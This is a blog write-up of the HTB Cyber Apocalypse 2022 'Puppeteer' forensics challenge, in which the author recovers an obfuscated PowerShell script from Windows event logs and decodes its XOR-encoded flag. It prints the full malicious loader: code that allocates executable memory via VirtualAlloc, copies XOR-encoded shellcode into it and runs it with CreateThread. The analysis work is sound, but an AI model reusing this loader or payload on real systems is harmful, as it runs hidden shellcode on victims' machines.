HTB Cyber Apocalypse CTF 2022 — Puppeteer Write up :: Ayo's Blog and stuff

Hello, I am Justayo1337 today I have a writeup for the HTB Cyber Apocalypse CTF 2022. I will focus on the Two Forensics challenges, I had time to take a look at during the allotted time for the CTF. I will focus on the Puppeteer Challenge in this Writeup. Alright! leggoooooo………… The file for the challenge can be downloaded from here.
So, when we unzip the challenge file, we see a Logs folder within. Within that Logs folder, we see lots of .evtx files which is commonly the extension for Event Log files on windows.

First Look

My first instinct was to open all the files using the Event Viewer utility on windows. But I noticed that there was pattern in the file sizes after taking another look at the folder and went on to only open the files that were not 68KB in size as I believed they would not contain important data. I only ended up opening these:

I made sure to focus more on the logs with Powershell or shell in the file name, due to the challenge name - Puppeteer. I foudn the most interesting piece of data within the file named “Microsoft-Windows-PowerShell%4Operational.evtx”.

third

From scrolling through, the log file contained an interesting encoded Powershell script. I later removed some parts of the code that I deemed not useful in understanding the main part of the script. But the original code is as follows:

$OleSPrlmhB = @" [DllImport("kernel32.dll")] public static extern  IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint  flProtect); 
[DllImport("kernel32.dll")] public static extern IntPtr  CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress,  IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 
"@ [byte[]]  $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2,  0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3; [byte[]] $stage2 = 0xac,  0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1,  0x8e, 0xe4, 0xa5, 0xe1, 0xe1; $tNZvQCljVk = Add-Type -memberDefinition  $OleSPrlmhB -Name "Win32" -namespace Win32Functions -passthru; 
[Byte[]]  $HVOASfFuNSxRXR =  0x2d,0x99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0xd1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x03,0xb4,0x99,0x5a,0x83,0xb1,0x99,0x5a,0x83,0xc9,0x80,0x87,0x99,0x5a,0x83,0xf1,0x99,0xde,0x66,0x9b,0x9b,0x9c,0xe0,0x18,0x99,0x5a,0xa3,0x81,0x99,0xe0,0x11,0x7d,0xed,0xb0,0xad,0xd3,0xfd,0xf1,0x90,0x10,0x18,0xdc,0x90,0xd0,0x10,0x33,0x3c,0x83,0x99,0x5a,0x83,0xf1,0x90,0x80,0x5a,0x93,0xed,0x99,0xd0,0x01,0xb7,0x50,0xa9,0xc9,0xda,0xd3,0xde,0x54,0xa3,0xd1,0xd1,0xd1,0x5a,0x51,0x59,0xd1,0xd1,0xd1,0x99,0x54,0x11,0xa5,0xb6,0x99,0xd0,0x01,0x5a,0x99,0xc9,0x81,0x95,0x5a,0x91,0xf1,0x98,0xd0,0x01,0x32,0x87,0x99,0x2e,0x18,0x9c,0xe0,0x18,0x90,0x5a,0xe5,0x59,0x99,0xd0,0x07,0x99,0xe0,0x11,0x90,0x10,0x18,0xdc,0x7d,0x90,0xd0,0x10,0xe9,0x31,0xa4,0x20,0x9d,0xd2,0x9d,0xf5,0xd9,0x94,0xe8,0x00,0xa4,0x09,0x89,0x95,0x5a,0x91,0xf5,0x98,0xd0,0x01,0xb7,0x90,0x5a,0xdd,0x99,0x95,0x5a,0x91,0xcd,0x98,0xd0,0x01,0x90,0x5a,0xd5,0x59,0x90,0x89,0x90,0x89,0x8f,0x88,0x99,0xd0,0x01,0x8b,0x90,0x89,0x90,0x88,0x90,0x8b,0x99,0x52,0x3d,0xf1,0x90,0x83,0x2e,0x31,0x89,0x90,0x88,0x8b,0x99,0x5a,0xc3,0x38,0x9a,0x2e,0x2e,0x2e,0x8c,0x98,0x6f,0xa6,0xa2,0xe3,0x8e,0xe2,0xe3,0xd1,0xd1,0x90,0x87,0x98,0x58,0x37,0x99,0x50,0x3d,0x71,0xd0,0xd1,0xd1,0x98,0x58,0x34,0x98,0x6d,0xd3,0xd1,0xd4,0xe8,0x11,0x79,0xd1,0xc3,0x90,0x85,0x98,0x58,0x35,0x9d,0x58,0x20,0x90,0x6b,0x9d,0xa6,0xf7,0xd6,0x2e,0x04,0x9d,0x58,0x3b,0xb9,0xd0,0xd0,0xd1,0xd1,0x88,0x90,0x6b,0xf8,0x51,0xba,0xd1,0x2e,0x04,0xbb,0xdb,0x90,0x8f,0x81,0x81,0x9c,0xe0,0x18,0x9c,0xe0,0x11,0x99,0x2e,0x11,0x99,0x58,0x13,0x99,0x2e,0x11,0x99,0x58,0x10,0x90,0x6b,0x3b,0xde,0x0e,0x31,0x2e,0x04,0x99,0x58,0x16,0xbb,0xc1,0x90,0x89,0x9d,0x58,0x33,0x99,0x58,0x28,0x90,0x6b,0x48,0x74,0xa5,0xb0,0x2e,0x04,0x54,0x11,0xa5,0xdb,0x98,0x2e,0x1f,0xa4,0x34,0x39,0x42,0xd1,0xd1,0xd1,0x99,0x52,0x3d,0xc1,0x99,0x58,0x33,0x9c,0xe0,0x18,0xbb,0xd5,0x90,0x89,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xaf,0x84,0x99,0x52,0x15,0xf1,0x8f,0x58,0x27,0xbb,0x91,0x90,0x88,0xb9,0xd1,0xc1,0xd1,0xd1,0x90,0x89,0x99,0x58,0x23,0x99,0xe0,0x18,0x90,0x6b,0x89,0x75,0x82,0x34,0x2e,0x04,0x99,0x58,0x12,0x98,0x58,0x16,0x9c,0xe0,0x18,0x98,0x58,0x21,0x99,0x58,0x0b,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xac,0xf9,0x89,0x90,0x86,0x88,0xb9,0xd1,0x91,0xd1,0xd1,0x90,0x89,0xbb,0xd1,0x8b,0x90,0x6b,0xda,0xfe,0xde,0xe1,0x2e,0x04,0x86,0x88,0x90,0x6b,0xa4,0xbf,0x9c,0xb0,0x2e,0x04,0x98,0x2e,0x1f,0x38,0xed,0x2e,0x2e,0x2e,0x99,0xd0,0x12,0x99,0xf8,0x17,0x99,0x54,0x27,0xa4,0x65,0x90,0x2e,0x36,0x89,0xbb,0xd1,0x88,0x98,0x16,0x13,0x21,0x64,0x73,0x87,0x2e,0x04;
  
[array]::Reverse($stage2); 
$hRffYLENA =  $tNZvQCljVk::VirtualAlloc(0,[Math]::Max($HVOASfFuNSxRXR.Length,0x1000),0x3000,0x40);  
$stage3 = $stage1 + $stage2;  [System.Runtime.InteropServices.Marshal]::Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);  
# Unpack Shellcode; 
for($i=0; $i -lt $HVOASfFuNSxRXR.count ; 
$i++) {  $HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1; } #Unpack Special Orders!  
for($i=0;$i -lt $stage3.count;$i++){ $stage3[$i] = $stage3[$i] -bxor 0xd1; }  
$tNZvQCljVk::CreateThread(0,0,$hRffYLENA,0,0,0);

I removed the parts that were not as useful and reworked the script to:

[Byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3; 
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;

[array]::Reverse($stage2);

$stage3 = $stage1 + $stage2;
for($i=0;$i -lt $stage3.count;$i++){ $stage3[$i] = $stage3[$i] -bxor 0xd1; }

Write-Output -InputObject $stage3

This script gave me the answer to the challenge. The script creates the two variables stage1 and stage2 which contain arrays of hex values. The values in stage2 are reversed as in the original script and then those arrays are then combined and stored in the stage3 variable. The stage3 array is then looped through and an xor operation between the value from the stage3 array and the hex value 0xd1 . The value is then replace with the result of the xor operation in the stage3 variable. Finally, I write out the decimal values and put them into Cyberchef to get the flag: HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3…}

Cyber Apocalypse Logo

P.S: One could also use this instead of just writing out the decimal values and then using an external site like Cyberchef to decode the values:

$op = [char[]]@($stage3)
$op -join ''

Final

Thanks for reading!!!

GIPHY